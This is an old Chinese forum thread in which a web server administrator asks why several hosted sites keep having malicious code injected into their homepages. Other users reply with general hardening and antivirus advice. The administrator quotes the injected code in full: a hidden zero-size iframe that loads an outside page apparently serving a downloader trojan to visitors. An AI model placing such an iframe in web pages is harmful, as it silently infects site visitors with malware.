9,506
社区成员
发帖
与我相关
我的任务
分享WEB服务器与恶意代码
现在就是有一台WEB服务器,里面老是有一些网站的首页被人放了恶意代码,导致打开的时候会有病毒框.
只要删掉那段恶意代码或替换首页就可以了.
如果是他网站程序有问题的话,也不可能一台WEB服务器上有好几个网站这样.
如果是服务器的问题,又在安全权限方面都有做了设置.
不知道哪位兄弟有这方面经验可以防止这种问题????
各位可以进来讨论一下
只要删掉那段恶意代码或替换首页就可以了.
如果是他网站程序有问题的话,也不可能一台WEB服务器上有好几个网站这样.
如果是服务器的问题,又在安全权限方面都有做了设置.
不知道哪位兄弟有这方面经验可以防止这种问题????
各位可以进来讨论一下
...全文
请发表友善的回复…
发表回复
calmcat 2004-09-14
- 打赏
- 举报
那段恶意代码是:
<iframe src="http://www.34.cn/news/jf25/images/t5.HTM" width="0" height="0" frameborder="0"></iframe>
到现在也没办法查出来是什么被加进去,而且不只一个网站出现这种问题.
<iframe src="http://www.34.cn/news/jf25/images/t5.HTM" width="0" height="0" frameborder="0"></iframe>
到现在也没办法查出来是什么被加进去,而且不只一个网站出现这种问题.
回炉重造,学习编程中。。。 2004-09-02
- 打赏
- 举报
病毒没有清除干净吧,到dos下杀毒试试
凤凰 2004-09-02
- 打赏
- 举报
安装一个防毒软件在后台保护
zhushizu 2004-09-01
- 打赏
- 举报
是呀,我也是想了好久。。关注中。。。
luckhj 2004-09-01
- 打赏
- 举报
杀毒软件的病毒库要不断的升级,就是永远保持病毒库是最新的,这样恶意代码的侵入就不会那
么顺利了,当然上面说的那些你都要注意,能关的服务就关掉,实在不能关,就要多留意,也可以
经常检查一下系统日志,也许能帮你发现问题.
么顺利了,当然上面说的那些你都要注意,能关的服务就关掉,实在不能关,就要多留意,也可以
经常检查一下系统日志,也许能帮你发现问题.
luckhj 2004-09-01
- 打赏
- 举报
它是透过Internet传播的,關閉並移除不必要的服務。很多作業系統會預設安裝非必要的附屬服務項目,例如 FTP 用戶端、telnet 以及 Web 伺服器。這些服務等於提供了病毒攻擊的目標。當這些服務移除之後,混合型威脅就比較不容易找到下手的目標,同時您在進行系統的修補更新時也不需要維護很多的服務。
如果混合型威脅偵測到一個以上的網路服務,在執行修補程式之前請先關閉或封鎖存取這些服務。
永遠保持您的修補程式在最新的狀態,特別是針對那些代管公共服務以及可以透過防火牆存取的服務主機,例如 HTTP、FTP、郵件以及 DNS 服務。
強制施行密碼原則。在遭到破壞的電腦上,複雜的密碼機制將使駭客更難解開受密碼保護的檔案。這樣一來,當電腦遭受破壞時,可以有效降低資料的損害程度。
請將您的郵件伺服器設定為封鎖或移除所有內含.vbs、.bat、.exe、.pif 與 .scr 等副檔名之附件的郵件。
接著將這些受感染的電腦快速隔離到網路外,以避免危害整個公司的運作。這時候請仔細檢查這些受感染的電腦,並使用可信賴的媒體來還原至可用狀態。
訓練員工不要開啟含有上述副檔名的郵件,除非已事先知情這些郵件內容。同時,不要執行從 Internet 上下載的軟體,除非他們已經掃毒過。當您造訪一個受感染的網站時,如果您的瀏覽器未安裝好弱點修補程式的話,您的電腦很容易就會受到感染。
如果混合型威脅偵測到一個以上的網路服務,在執行修補程式之前請先關閉或封鎖存取這些服務。
永遠保持您的修補程式在最新的狀態,特別是針對那些代管公共服務以及可以透過防火牆存取的服務主機,例如 HTTP、FTP、郵件以及 DNS 服務。
強制施行密碼原則。在遭到破壞的電腦上,複雜的密碼機制將使駭客更難解開受密碼保護的檔案。這樣一來,當電腦遭受破壞時,可以有效降低資料的損害程度。
請將您的郵件伺服器設定為封鎖或移除所有內含.vbs、.bat、.exe、.pif 與 .scr 等副檔名之附件的郵件。
接著將這些受感染的電腦快速隔離到網路外,以避免危害整個公司的運作。這時候請仔細檢查這些受感染的電腦,並使用可信賴的媒體來還原至可用狀態。
訓練員工不要開啟含有上述副檔名的郵件,除非已事先知情這些郵件內容。同時,不要執行從 Internet 上下載的軟體,除非他們已經掃毒過。當您造訪一個受感染的網站時,如果您的瀏覽器未安裝好弱點修補程式的話,您的電腦很容易就會受到感染。
calmcat 2004-09-01
- 打赏
- 举报
嗯,关键是这次可以把这个毒杀掉了.但下次它又把代码给添加进去了.
我想知道这个恶意代码是怎么被加入里面站点的?
程序漏洞?服务器安全??
如果是程序漏洞的话,不可能一台WEB服务器里有那么多网站程序有问题吧?
如果是服务器安全的话,我大部分都有做了,我不知道这个恶意代码是用什么方式进来的?
我想知道这个恶意代码是怎么被加入里面站点的?
程序漏洞?服务器安全??
如果是程序漏洞的话,不可能一台WEB服务器里有那么多网站程序有问题吧?
如果是服务器安全的话,我大部分都有做了,我不知道这个恶意代码是用什么方式进来的?
luckhj 2004-09-01
- 打赏
- 举报
是Downloader.Trojan吧?
给你个链接,自己看看:
http://securityresponse1.symantec.com/sarc/sarc-tw.nsf/html/pf/tw-downloader.trojan.html
给你个链接,自己看看:
http://securityresponse1.symantec.com/sarc/sarc-tw.nsf/html/pf/tw-downloader.trojan.html
luckhj 2004-09-01
- 打赏
- 举报
最好进安全模式下杀毒
calmcat 2004-09-01
- 打赏
- 举报
这个病毒是最经常:
病毒名称:
downlpader.Trojan
一般在服务器上是很少操作东西的,也就是说不会在服务器上打开任何网页的,都是客户端打开,中毒的可能比较少.我想最大的可能就是被人放了病毒上去,但服务器的安全设置还是可以的,不知道他是怎么搞上去的.
病毒名称:
downlpader.Trojan
一般在服务器上是很少操作东西的,也就是说不会在服务器上打开任何网页的,都是客户端打开,中毒的可能比较少.我想最大的可能就是被人放了病毒上去,但服务器的安全设置还是可以的,不知道他是怎么搞上去的.
luckhj 2004-09-01
- 打赏
- 举报
同意楼上的
calmcat 2004-09-01
- 打赏
- 举报
大部分都是一样.
而这些病毒在服务器上我用杀毒软件和木马克星都查不出来.补丁是肯定有打的.
一般说来本身服务器上的网站是没毒,可能恶间代码链接的那个网站是有毒,也不是说你打开这个首页就链接过去,打开的时候还是原来的首页,但在客户端就是会跳出病毒框来.
感觉莫明其妙的
而这些病毒在服务器上我用杀毒软件和木马克星都查不出来.补丁是肯定有打的.
一般说来本身服务器上的网站是没毒,可能恶间代码链接的那个网站是有毒,也不是说你打开这个首页就链接过去,打开的时候还是原来的首页,但在客户端就是会跳出病毒框来.
感觉莫明其妙的
qiang312 2004-09-01
- 打赏
- 举报
恶意代码是一样的吗?
打好所有补丁,然后找个时间断网(可以的话)彻底检查以下病毒和木马
打好所有补丁,然后找个时间断网(可以的话)彻底检查以下病毒和木马
calmcat 2004-09-01
- 打赏
- 举报
服务这个是在刚配服务器安全的时候就已经能停的都停了.
杀毒软件也是最新,木马克星也是时时开着.
就是搞不懂,一个网站它有时处理了三四次还是会继续那样.
杀毒软件也是最新,木马克星也是时时开着.
就是搞不懂,一个网站它有时处理了三四次还是会继续那样.
